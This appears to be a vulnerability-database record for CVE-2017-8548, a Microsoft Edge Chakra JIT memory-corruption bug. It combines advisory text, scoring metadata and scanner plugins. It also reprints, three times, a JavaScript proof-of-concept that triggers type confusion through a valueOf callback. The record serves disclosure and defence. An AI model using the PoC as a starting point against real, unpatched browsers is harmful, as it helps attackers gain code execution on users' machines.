Scripting Engine Memory Corruption Vulnerability

2017-06-13T07:00:00

Description

A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.

{"id": "MS:CVE-2017-8548", "bulletinFamily": "microsoft", "title": "Scripting Engine Memory Corruption Vulnerability", "description": "A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe security update addresses the vulnerability by modifying how Microsoft browser JavaScript scripting engines handle objects in memory.\n", "published": "2017-06-13T07:00:00", "modified": "2017-06-27T07:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.6, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 4.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8548", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-8548", "CVE-2017-8529"], "immutableFields": [], "type": "mscve", "lastseen": "2021-12-06T18:25:22", "edition": 1, "viewCount": 3, "enchantments": {"backreferences": {"references": [{"idList": ["TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090"], "type": "trendmicroblog"}, {"idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336"], "type": "talosblog"}, {"idList": ["OPENVAS:1361412562310811154", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310810903", "OPENVAS:1361412562310811171", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811167"], "type": "openvas"}, {"idList": ["CISA:574A6E25827684C587359C37EF1D5132"], "type": "cisa"}, {"idList": ["CVE-2017-8548", "CVE-2017-8529"], "type": "cve"}, {"idList": ["PACKETSTORM:143795"], "type": "packetstorm"}, {"idList": ["KLA11045"], "type": "kaspersky"}, {"idList": ["SSV:96357"], "type": "seebug"}, {"idList": ["1337DAY-ID-28288"], "type": "zdt"}, {"idList": ["MS:CVE-2017-8466", "MS:CVE-2017-0288", "MS:CVE-2017-8490", "MS:CVE-2017-8532", "MS:CVE-2017-8524", "MS:CVE-2017-0282", "MS:CVE-2017-8482", "MS:CVE-2017-8554", "MS:CVE-2017-0287", "MS:CVE-2017-8478", "MS:CVE-2017-8530", "MS:CVE-2017-8517", "MS:CVE-2017-8465", "MS:CVE-2017-8476", "MS:CVE-2017-8494", "MS:CVE-2017-0298", "MS:CVE-2017-0295", "MS:CVE-2017-8547", "MS:CVE-2017-8579", "MS:CVE-2017-0193", "MS:CVE-2017-8469", "MS:CVE-2017-8492", "MS:CVE-2017-0219", "MS:CVE-2017-8477", "MS:CVE-2017-8543", "MS:CVE-2017-8470", "MS:CVE-2017-8474", "MS:CVE-2017-8553", "MS:CVE-2017-0297", "MS:CVE-2017-8468", "MS:CVE-2017-0300", "MS:CVE-2017-0296", "MS:CVE-2017-0299", "MS:CVE-2017-0218", "MS:CVE-2017-8528", "MS:CVE-2017-8475", "MS:CVE-2017-8489", "MS:CVE-2017-8531", "MS:CVE-2017-8504", "MS:CVE-2017-8527", "MS:CVE-2017-0284", "MS:CVE-2017-8480", "MS:CVE-2017-8483", "MS:CVE-2017-8481", "MS:CVE-2017-8544", "MS:CVE-2017-8498", "MS:CVE-2017-8473", "MS:CVE-2017-8485", "MS:CVE-2017-8499", "MS:CVE-2017-8534", "MS:CVE-2017-8460", "MS:CVE-2017-8523", "MS:CVE-2017-8493", "MS:CVE-2017-8497", "MS:CVE-2017-0294", "MS:CVE-2017-8520", "MS:CVE-2017-8491", "MS:CVE-2017-8471", "MS:CVE-2017-0215", "MS:CVE-2017-0286", "MS:CVE-2017-8522", "MS:CVE-2017-8488", "MS:CVE-2017-8576", "MS:CVE-2017-0216", "MS:CVE-2017-8496", "MS:CVE-2017-8549", "MS:CVE-2017-8484", "MS:CVE-2017-0291", "MS:CVE-2017-8575", "MS:CVE-2017-0173", "MS:CVE-2017-8521", "MS:CVE-2017-8462", "MS:CVE-2017-0292", "MS:CVE-2017-8529", "MS:CVE-2017-0283", "MS:CVE-2017-0285", "MS:CVE-2017-8479", "MS:CVE-2017-0289", "MS:CVE-2017-8555", "MS:CVE-2017-8472", "MS:CVE-2017-8533", "MS:CVE-2017-8519", "MS:CVE-2017-8515", "MS:CVE-2017-8464"], "type": "mscve"}, {"idList": ["THREATPOST:2C2827FBF9D900F4194802CE8C471B4C"], "type": "threatpost"}, {"idList": ["KB4036586", "KB4019473"], "type": "mskb"}, {"idList": ["RAPID7COMMUNITY:2686BC995183CF24B568CF55F2EDAD7B"], "type": "rapid7community"}, {"idList": ["SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL"], "type": "nessus"}, {"idList": ["CPAI-2017-0168", "CPAI-2017-0456"], "type": "checkpoint_advisories"}]}, "dependencies": {"references": [{"idList": ["TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090"], "type": "trendmicroblog"}, {"idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336"], "type": "talosblog"}, {"idList": ["CVE-2017-8548", "CVE-2017-8529"], "type": "cve"}, {"idList": ["PACKETSTORM:143795"], "type": "packetstorm"}, {"idList": ["SSV:96357"], "type": "seebug"}, {"idList": ["1337DAY-ID-28288"], "type": "zdt"}, {"idList": ["SMB_NT_MS17_JUN_4022725.NASL", "SMB_NT_MS17_SEP_4038792.NASL", "SMB_NT_MS17_SEP_4038788.NASL", "SMB_NT_MS17_SEP_4038781.NASL", "SMB_NT_MS17_JUN_4022727.NASL", "SMB_NT_MS17_SEP_4038777.NASL", "SMB_NT_MS17_JUN_4022715.NASL", "SMB_NT_MS17_SEP_4038783.NASL", "SMB_NT_MS17_JUN_4022714.NASL", "SMB_NT_MS17_SEP_CVE-2017-8529.NASL", "SMB_NT_MS17_SEP_4038782.NASL", "SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL", "SMB_NT_MS17_SEP_4038799.NASL", "SMB_NT_MS17_SEP_INTERNET_EXPLORER.NASL"], "type": "nessus"}, {"idList": ["KLA11842", "KLA11045"], "type": "kaspersky"}, {"idList": ["KB4036586"], "type": "mskb"}, {"idList": ["MS:CVE-2017-8466", "MS:CVE-2017-0288", "MS:CVE-2017-8490", "MS:CVE-2017-8532", "MS:CVE-2017-8524", "MS:CVE-2017-0282", "MS:CVE-2017-8482", "MS:CVE-2017-8554", "MS:CVE-2017-0287", "MS:CVE-2017-8478", "MS:CVE-2017-8530", "MS:CVE-2017-8517", "MS:CVE-2017-8465", "MS:CVE-2017-8476", "MS:CVE-2017-8494", "MS:CVE-2017-0298", "MS:CVE-2017-0295", "MS:CVE-2017-8547", "MS:CVE-2017-8579", "MS:CVE-2017-0193", "MS:CVE-2017-8469", "MS:CVE-2017-8492", "MS:CVE-2017-0219", "MS:CVE-2017-8477", "MS:CVE-2017-8543", "MS:CVE-2017-8470", "MS:CVE-2017-8474", "MS:CVE-2017-8553", "MS:CVE-2017-0297", "MS:CVE-2017-8468", "MS:CVE-2017-0300", "MS:CVE-2017-0296", "MS:CVE-2017-0299", "MS:CVE-2017-0218", "MS:CVE-2017-8528", "MS:CVE-2017-8475", "MS:CVE-2017-8489", "MS:CVE-2017-8531", "MS:CVE-2017-8504", "MS:CVE-2017-8527", "MS:CVE-2017-0284", "MS:CVE-2017-8480", "MS:CVE-2017-8483", "MS:CVE-2017-8481", "MS:CVE-2017-8544", "MS:CVE-2017-8498", "MS:CVE-2017-8473", "MS:CVE-2017-8485", "MS:CVE-2017-8499", "MS:CVE-2017-8534", "MS:CVE-2017-8460", "MS:CVE-2017-8523", "MS:CVE-2017-8493", "MS:CVE-2017-8497", "MS:CVE-2017-0294", "MS:CVE-2017-8520", "MS:CVE-2017-8491", "MS:CVE-2017-8471", "MS:CVE-2017-0215", "MS:CVE-2017-0286", "MS:CVE-2017-8522", "MS:CVE-2017-8488", "MS:CVE-2017-8576", "MS:CVE-2017-0216", "MS:CVE-2017-8496", "MS:CVE-2017-8549", "MS:CVE-2017-8484", "MS:CVE-2017-0291", "MS:CVE-2017-8575", "MS:CVE-2017-0173", "MS:CVE-2017-8521", "MS:CVE-2017-8462", "MS:CVE-2017-0292", "MS:CVE-2017-8529", "MS:CVE-2017-0283", "MS:CVE-2017-0285", "MS:CVE-2017-8479", "MS:CVE-2017-0289", "MS:CVE-2017-8555", "MS:CVE-2017-8472", "MS:CVE-2017-8533", "MS:CVE-2017-8519", "MS:CVE-2017-8515", "MS:CVE-2017-8464"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310811154", "OPENVAS:1361412562310810943", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310810903", "OPENVAS:1361412562310811171", "OPENVAS:1361412562310811173", "OPENVAS:1361412562310811760", "OPENVAS:1361412562310811167"], "type": "openvas"}, {"idList": ["RAPID7COMMUNITY:2686BC995183CF24B568CF55F2EDAD7B"], "type": "rapid7community"}, {"idList": ["SMNTC-98953", "SMNTC-98954"], "type": "symantec"}, {"idList": ["CPAI-2017-0168", "CPAI-2017-0456"], "type": "checkpoint_advisories"}], "rev": 4}, "exploitation": null, "score": {"value": 1.5, "vector": "NONE"}, "vulnersScore": 1.5}, "kbList": ["KB4022725", "KB4019474", "KB4022715", "KB4019473", "KB4019472", "KB4016871", "KB4022727", "KB4022714"], "msrc": "", "mscve": "CVE-2017-8548", "msAffectedSoftware": [{"kb": "KB4022725", "kbSupersedence": "KB4016871", "msplatform": "Windows 10 Version 1703 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022725", "kbSupersedence": "KB4016871", "msplatform": "Windows 10 Version 1703 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022715", "kbSupersedence": "KB4019472", "msplatform": "Windows 10 Version 1607 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022727", "kbSupersedence": "KB4019474", "msplatform": "Windows 10 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022714", "kbSupersedence": "KB4019473", "msplatform": "Windows 10 Version 1511 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022727", "kbSupersedence": "KB4019474", "msplatform": "Windows 10 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022715", "kbSupersedence": "KB4019472", "msplatform": "Windows 10 Version 1607 for x64-based Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022714", "kbSupersedence": "KB4019473", "msplatform": "Windows 10 Version 1511 for 32-bit Systems", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}, {"kb": "KB4022715", "kbSupersedence": "KB4019472", "msplatform": "Windows Server 2016", "name": "microsoft edge (edgehtml-based)", "operator": "", "version": ""}], "vendorCvss": {"baseScore": "4.2", "temporalScore": "3.8", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C"}, "_state": {"dependencies": 1647589307, "score": 1659749172}}

{"symantec": [{"lastseen": "2018-03-14T04:08:10", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "symantec", "title": "Microsoft Edge CVE-2017-8548 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-06-13T00:00:00", "id": "SMNTC-98954", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98954", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:23", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to an information disclosure vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet Explorer 9, 10, 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Edge \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-8529 Information Disclosure Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-8529"], "modified": "2017-06-13T00:00:00", "id": "SMNTC-98953", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98953", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-04-09T13:37:46", "description": "This is a follow-up finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient.", "cvss3": {}, "published": "2017-08-17T00:00:00", "type": "zdt", "title": "Microsoft Edge Chakra Incorrect Jit Optimization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-08-17T00:00:00", "id": "1337DAY-ID-28288", "href": "https://0day.today/exploit/description/28288", "sourceData": "Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2\r\n\r\nCVE-2017-8548\r\n\r\n\r\nI think the fix for #1045 is incorrect.\r\n\r\nHere's the original PoC.\r\n\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(100);\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n\r\n\r\nI just changed \"var b = new Uint32Array(100);\" to \"var b = new Uint32Array(0);\", and it worked well.\r\n\r\nPoC:\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(0); // <<--------- 100 -> 0\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\n\r\nFound by: lokihardt\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28288", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:55:52", "description": "I think the fix for #1045 is incorrect.\r\n\r\nHere's the original PoC.\r\n```\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(100);\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n```\r\n\r\nI just changed \"`var b = new Uint32Array(100);`\" to \"`var b = new Uint32Array(0);`\", and it worked well.\r\n\r\n### PoC:\r\n```\r\n'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(0); // <<--------- 100 -> 0\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\r\n```", "cvss3": {}, "published": "2017-08-17T00:00:00", "type": "seebug", "title": "Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2(CVE-2017-8548)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96357", "id": "SSV:96357", "sourceData": "\n 'use strict';\r\n\r\nfunction func(a, b, c) {\r\n a[0] = 1.2;\r\n b[0] = c;\r\n a[1] = 2.2;\r\n a[0] = 2.3023e-320;\r\n}\r\n\r\nfunction main() {\r\n var a = [1.1, 2.2];\r\n var b = new Uint32Array(0); // <<--------- 100 -> 0\r\n\r\n // force to optimize\r\n for (var i = 0; i < 0x10000; i++)\r\n func(a, b, i);\r\n\r\n func(a, b, {valueOf: () => {\r\n a[0] = {};\r\n\r\n return 0;\r\n }});\r\n\r\n a[0].toString();\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96357", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-08-18T07:28:40", "description": "", "cvss3": {}, "published": "2017-08-16T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra Incorrect Jit Optimization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8548"], "modified": "2017-08-16T00:00:00", "id": "PACKETSTORM:143795", "href": "https://packetstormsecurity.com/files/143795/Microsoft-Edge-Chakra-Incorrect-Jit-Optimization.html", "sourceData": "`Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2 \n \nCVE-2017-8548 \n \n \nI think the fix for #1045 is incorrect. \n \nHere's the original PoC. \n \n'use strict'; \n \nfunction func(a, b, c) { \na[0] = 1.2; \nb[0] = c; \na[1] = 2.2; \na[0] = 2.3023e-320; \n} \n \nfunction main() { \nvar a = [1.1, 2.2]; \nvar b = new Uint32Array(100); \n \n// force to optimize \nfor (var i = 0; i < 0x10000; i++) \nfunc(a, b, i); \n \nfunc(a, b, {valueOf: () => { \na[0] = {}; \n \nreturn 0; \n}}); \n \na[0].toString(); \n} \n \nmain(); \n \n \nI just changed \"var b = new Uint32Array(100);\" to \"var b = new Uint32Array(0);\", and it worked well. \n \nPoC: \n'use strict'; \n \nfunction func(a, b, c) { \na[0] = 1.2; \nb[0] = c; \na[1] = 2.2; \na[0] = 2.3023e-320; \n} \n \nfunction main() { \nvar a = [1.1, 2.2]; \nvar b = new Uint32Array(0); // <<--------- 100 -> 0 \n \n// force to optimize \nfor (var i = 0; i < 0x10000; i++) \nfunc(a, b, i); \n \nfunc(a, b, {valueOf: () => { \na[0] = {}; \n \nreturn 0; \n}}); \n \na[0].toString(); \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/143795/GS20170816235516.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-01-11T15:04:57", "description": "This plugin was depredated as it was referencing a CVE which wasn't properly fixed until September 2017. The replacement plugin addresses all Windows 10 / Server 2016 registry requirements for CVE-2017-8 (deprecais plugin was depredated as it was referencing a CVE which wasn't properly fixed until September 2017. The replacement plugin (ID# 9999999) addresses all Windows 10 / Server 2016 registry and patch requirements for CVE-2017-8529.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-01-17T00:00:00", "type": "nessus", "title": "KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 (CVE-2017-8529) (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2020-05-28T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_JUN_4022715_CVE-2017-8529.NASL", "href": "https://www.tenable.com/plugins/nessus/133048", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2020/05/22. Deprecated by smb_nt_ms17_sep_CVE-2017-8529.nasl.\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133048);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\"CVE-2017-8529\");\n script_bugtraq_id(98953);\n script_xref(name:\"MSKB\", value:\"4022715\");\n script_xref(name:\"MSFT\", value:\"MS17-4022715\");\n\n script_name(english:\"KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 (CVE-2017-8529) (deprecated)\");\n script_summary(english:\"Checks for presence of the patch rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin was depredated as it was referencing a CVE which wasn't properly fixed until September 2017. The replacement plugin addresses all Windows 10 / Server 2016 registry requirements for CVE-2017-8 (deprecais plugin was depredated as it was referencing a CVE which wasn't properly fixed until September 2017. The replacement plugin (ID# 9999999) addresses all Windows 10 / Server 2016 registry and patch requirements for CVE-2017-8529.\");\n # https://support.microsoft.com/en-us/help/4022715/windows-10-update-kb4022715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac6572f\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f6a3c24\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8529\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:13:06", "description": "The remote Windows host is missing a security update or a registry setting required to enable protections for CVE-2017-8529. It is, therefore, affected by an information disclosure vulnerability:\n\n- An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer. In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-05-28T00:00:00", "type": "nessus", "title": "Windows 10 / Windows Server 2016 September 2017 Information Disclosure Vulnerability (CVE-2017-8529)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 